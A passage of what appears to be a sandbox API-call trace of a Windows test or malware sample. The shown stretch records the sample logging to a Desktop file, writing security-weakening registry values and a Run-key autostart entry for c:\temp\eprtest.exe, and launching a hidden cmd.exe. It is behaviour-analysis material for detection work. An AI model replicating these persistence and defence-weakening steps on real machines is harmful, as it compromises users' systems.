lpType=0x12fec0c, lpData=0x0, lpcbData=0x12fec08*=0x0 | out: lpType=0x12fec0c*=0x0, lpData=0x0, lpcbData=0x12fec08*=0x0) returned 0x2 [0168.838] RegSetValueExW (in: hKey=0x428, lpValueName="Level", Reserved=0x0, dwType=0x1, lpData="1", cbData=0x4 | out: lpData="1") returned 0x0 [0168.839] RegCloseKey (hKey=0x428) returned 0x0 [0168.839] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0171.606] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0171.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb18) returned 1 [0171.606] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x12feb94 | out: lpFileInformation=0x12feb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x68ccaad5, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x167)) returned 1 [0171.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb14) returned 1 [0171.607] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0171.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb64) returned 1 [0171.607] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x3134d84 | out: lpFileInformation=0x3134d84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x68ccaad5, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x167)) returned 1 [0171.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb60) returned 1 [0171.608] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe544, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0171.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12fea88) returned 1 [0171.609] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x428 [0171.609] GetFileType (hFile=0x428) returned 0x1 [0171.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12fea84) returned 1 [0171.610] GetFileType (hFile=0x428) returned 0x1 [0171.610] SetFilePointer (in: hFile=0x428, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fea5c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12fea5c*=0) returned 0x167 [0171.612] WriteFile (in: hFile=0x428, lpBuffer=0x3136588*, nNumberOfBytesToWrite=0x65, lpNumberOfBytesWritten=0x12feb18, lpOverlapped=0x0 | out: lpBuffer=0x3136588*, lpNumberOfBytesWritten=0x12feb18*=0x65, lpOverlapped=0x0) returned 1 [0171.612] CloseHandle (hObject=0x428) returned 1 [0171.914] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Malwarebytes\\Ekati\\Excel\\Security", ulOptions=0x0, samDesired=0x2001f, phkResult=0x12febdc | out: phkResult=0x12febdc*=0x428) returned 0x0 [0171.915] RegQueryValueExW (in: hKey=0x428, lpValueName="CertificateRevocation", lpReserved=0x0, lpType=0x12fec0c, lpData=0x0, lpcbData=0x12fec08*=0x0 | out: lpType=0x12fec0c*=0x0, lpData=0x0, lpcbData=0x12fec08*=0x0) returned 0x2 [0171.915] RegSetValueExW (in: hKey=0x428, lpValueName="CertificateRevocation", Reserved=0x0, dwType=0x1, lpData="0", cbData=0x4 | out: lpData="0") returned 0x0 [0171.915] RegCloseKey (hKey=0x428) returned 0x0 [0171.916] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0173.293] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0173.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb18) returned 1 [0173.293] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x12feb94 | out: lpFileInformation=0x12feb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x6aa27221, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x1cc)) returned 1 [0173.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb14) returned 1 [0173.294] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0173.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb64) returned 1 [0173.294] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x31379d4 | out: lpFileInformation=0x31379d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x6aa27221, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x1cc)) returned 1 [0173.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb60) returned 1 [0173.294] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe544, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0173.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12fea88) returned 1 [0173.295] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x428 [0173.295] GetFileType (hFile=0x428) returned 0x1 [0173.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12fea84) returned 1 [0173.295] GetFileType (hFile=0x428) returned 0x1 [0173.296] SetFilePointer (in: hFile=0x428, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fea5c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12fea5c*=0) returned 0x1cc [0173.297] WriteFile (in: hFile=0x428, lpBuffer=0x313921c*, nNumberOfBytesToWrite=0x76, lpNumberOfBytesWritten=0x12feb18, lpOverlapped=0x0 | out: lpBuffer=0x313921c*, lpNumberOfBytesWritten=0x12feb18*=0x76, lpOverlapped=0x0) returned 1 [0173.298] CloseHandle (hObject=0x428) returned 1 [0173.818] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Malwarebytes\\Ekati\\Excel\\Security", ulOptions=0x0, samDesired=0x2001f, phkResult=0x12febdc | out: phkResult=0x12febdc*=0x428) returned 0x0 [0173.820] RegQueryValueExW (in: hKey=0x428, lpValueName="DisableScriptDebuggerIE", lpReserved=0x0, lpType=0x12fec0c, lpData=0x0, lpcbData=0x12fec08*=0x0 | out: lpType=0x12fec0c*=0x0, lpData=0x0, lpcbData=0x12fec08*=0x0) returned 0x2 [0173.820] RegSetValueExW (in: hKey=0x428, lpValueName="DisableScriptDebuggerIE", Reserved=0x0, dwType=0x1, lpData="yes", cbData=0x8 | out: lpData="yes") returned 0x0 [0173.820] RegCloseKey (hKey=0x428) returned 0x0 [0173.820] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0175.214] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0175.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb18) returned 1 [0175.215] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x12feb94 | out: lpFileInformation=0x12feb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x6ba44b91, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x242)) returned 1 [0175.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb14) returned 1 [0175.216] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0175.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb64) returned 1 [0175.216] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x313a690 | out: lpFileInformation=0x313a690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x6ba44b91, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x242)) returned 1 [0175.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb60) returned 1 [0175.217] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe544, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0175.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12fea88) returned 1 [0175.217] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x428 [0175.218] GetFileType (hFile=0x428) returned 0x1 [0175.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12fea84) returned 1 [0175.218] GetFileType (hFile=0x428) returned 0x1 [0175.218] SetFilePointer (in: hFile=0x428, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fea5c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12fea5c*=0) returned 0x242 [0175.220] WriteFile (in: hFile=0x428, lpBuffer=0x313bee8*, nNumberOfBytesToWrite=0x7a, lpNumberOfBytesWritten=0x12feb18, lpOverlapped=0x0 | out: lpBuffer=0x313bee8*, lpNumberOfBytesWritten=0x12feb18*=0x7a, lpOverlapped=0x0) returned 1 [0175.220] CloseHandle (hObject=0x428) returned 1 [0175.590] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Malwarebytes\\Ekati\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x2001f, phkResult=0x12febdc | out: phkResult=0x12febdc*=0x0) returned 0x2 [0175.591] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Malwarebytes\\Ekati\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x12febd8, lpdwDisposition=0x12fec4c | out: phkResult=0x12febd8*=0x3a0, lpdwDisposition=0x12fec4c*=0x1) returned 0x0 [0175.594] RegQueryValueExW (in: hKey=0x3a0, lpValueName="EPRTest", lpReserved=0x0, lpType=0x12fec0c, lpData=0x0, lpcbData=0x12fec08*=0x0 | out: lpType=0x12fec0c*=0x0, lpData=0x0, lpcbData=0x12fec08*=0x0) returned 0x2 [0175.594] RegSetValueExW (in: hKey=0x3a0, lpValueName="EPRTest", Reserved=0x0, dwType=0x1, lpData="c:\\temp\\eprtest.exe", cbData=0x28 | out: lpData="c:\\temp\\eprtest.exe") returned 0x0 [0175.595] RegCloseKey (hKey=0x3a0) returned 0x0 [0175.595] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0177.109] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0177.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb18) returned 1 [0177.109] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x12feb94 | out: lpFileInformation=0x12feb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x6cc98a47, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x2bc)) returned 1 [0177.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb14) returned 1 [0177.110] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0177.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb64) returned 1 [0177.110] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x313d4a8 | out: lpFileInformation=0x313d4a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x6cc98a47, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x2bc)) returned 1 [0177.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb60) returned 1 [0177.111] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe544, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0177.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12fea88) returned 1 [0177.111] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3a0 [0177.111] GetFileType (hFile=0x3a0) returned 0x1 [0177.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12fea84) returned 1 [0177.112] GetFileType (hFile=0x3a0) returned 0x1 [0177.112] SetFilePointer (in: hFile=0x3a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fea5c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12fea5c*=0) returned 0x2bc [0177.113] WriteFile (in: hFile=0x3a0, lpBuffer=0x313ed7c*, nNumberOfBytesToWrite=0x99, lpNumberOfBytesWritten=0x12feb18, lpOverlapped=0x0 | out: lpBuffer=0x313ed7c*, lpNumberOfBytesWritten=0x12feb18*=0x99, lpOverlapped=0x0) returned 1 [0177.145] CloseHandle (hObject=0x3a0) returned 1 [0177.147] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Malwarebytes\\Ekati\\Excel\\Security", ulOptions=0x0, samDesired=0x2001f, phkResult=0x12febdc | out: phkResult=0x12febdc*=0x3a0) returned 0x0 [0177.148] RegQueryValueExW (in: hKey=0x3a0, lpValueName="NoSelectDownloadDir", lpReserved=0x0, lpType=0x12fec0c, lpData=0x0, lpcbData=0x12fec08*=0x0 | out: lpType=0x12fec0c*=0x0, lpData=0x0, lpcbData=0x12fec08*=0x0) returned 0x2 [0177.148] RegSetValueExW (in: hKey=0x3a0, lpValueName="NoSelectDownloadDir", Reserved=0x0, dwType=0x1, lpData="1", cbData=0x4 | out: lpData="1") returned 0x0 [0177.149] RegCloseKey (hKey=0x3a0) returned 0x0 [0177.150] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0178.736] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0178.737] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb18) returned 1 [0178.737] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x12feb94 | out: lpFileInformation=0x12feb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x6def24e5, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x355)) returned 1 [0178.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb14) returned 1 [0178.737] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0178.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb64) returned 1 [0178.738] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x314022c | out: lpFileInformation=0x314022c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x6def24e5, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x355)) returned 1 [0178.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb60) returned 1 [0178.738] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe544, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0178.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12fea88) returned 1 [0178.739] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3a0 [0178.739] GetFileType (hFile=0x3a0) returned 0x1 [0178.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12fea84) returned 1 [0178.740] GetFileType (hFile=0x3a0) returned 0x1 [0178.740] SetFilePointer (in: hFile=0x3a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fea5c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12fea5c*=0) returned 0x355 [0178.742] WriteFile (in: hFile=0x3a0, lpBuffer=0x3141a6c*, nNumberOfBytesToWrite=0x74, lpNumberOfBytesWritten=0x12feb18, lpOverlapped=0x0 | out: lpBuffer=0x3141a6c*, lpNumberOfBytesWritten=0x12feb18*=0x74, lpOverlapped=0x0) returned 1 [0178.743] CloseHandle (hObject=0x3a0) returned 1 [0178.852] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Malwarebytes\\Ekati\\Excel\\Security", ulOptions=0x0, samDesired=0x2001f, phkResult=0x12febdc | out: phkResult=0x12febdc*=0x3a0) returned 0x0 [0178.853] RegQueryValueExW (in: hKey=0x3a0, lpValueName="NoDesktop", lpReserved=0x0, lpType=0x12fec0c, lpData=0x0, lpcbData=0x12fec08*=0x0 | out: lpType=0x12fec0c*=0x0, lpData=0x0, lpcbData=0x12fec08*=0x0) returned 0x2 [0178.853] RegSetValueExW (in: hKey=0x3a0, lpValueName="NoDesktop", Reserved=0x0, dwType=0x1, lpData="1", cbData=0x4 | out: lpData="1") returned 0x0 [0178.853] RegCloseKey (hKey=0x3a0) returned 0x0 [0178.853] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0180.169] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0180.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb18) returned 1 [0180.170] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x12feb94 | out: lpFileInformation=0x12feb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x6ee25568, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x3c9)) returned 1 [0180.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb14) returned 1 [0180.170] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0180.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb64) returned 1 [0180.171] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x3142ebc | out: lpFileInformation=0x3142ebc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x6ee25568, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x3c9)) returned 1 [0180.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb60) returned 1 [0180.171] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe544, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0180.171] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12fea88) returned 1 [0180.171] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3a0 [0180.172] GetFileType (hFile=0x3a0) returned 0x1 [0180.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12fea84) returned 1 [0180.172] GetFileType (hFile=0x3a0) returned 0x1 [0180.172] SetFilePointer (in: hFile=0x3a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fea5c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12fea5c*=0) returned 0x3c9 [0180.174] WriteFile (in: hFile=0x3a0, lpBuffer=0x31446d4*, nNumberOfBytesToWrite=0x6a, lpNumberOfBytesWritten=0x12feb18, lpOverlapped=0x0 | out: lpBuffer=0x31446d4*, lpNumberOfBytesWritten=0x12feb18*=0x6a, lpOverlapped=0x0) returned 1 [0180.174] CloseHandle (hObject=0x3a0) returned 1 [0180.335] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0180.336] CreatePipe (in: hReadPipe=0x12feb78, hWritePipe=0x12feb74, lpPipeAttributes=0x12feaf8, nSize=0x0 | out: hReadPipe=0x12feb78*=0x3a0, hWritePipe=0x12feb74*=0x428) returned 1 [0180.337] GetCurrentProcess () returned 0xffffffff [0180.337] GetCurrentProcess () returned 0xffffffff [0180.338] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12feb7c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x12feb7c*=0x440) returned 1 [0180.338] CloseHandle (hObject=0x3a0) returned 1 [0180.338] CreatePipe (in: hReadPipe=0x12feb78, hWritePipe=0x12feb74, lpPipeAttributes=0x12feaf8, nSize=0x0 | out: hReadPipe=0x12feb78*=0x3a0, hWritePipe=0x12feb74*=0x43c) returned 1 [0180.339] GetCurrentProcess () returned 0xffffffff [0180.339] GetCurrentProcess () returned 0xffffffff [0180.339] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12feb7c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x12feb7c*=0x448) returned 1 [0180.339] CloseHandle (hObject=0x3a0) returned 1 [0180.340] CoTaskMemAlloc (cb=0x20e) returned 0x15df410 [0180.340] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x15df410 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0180.340] CoTaskMemFree (pv=0x15df410) [0180.341] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"cmd.exe\" /c message.html", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x12feac0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x428, hStdError=0x43c), lpProcessInformation=0x31459b8 | out: 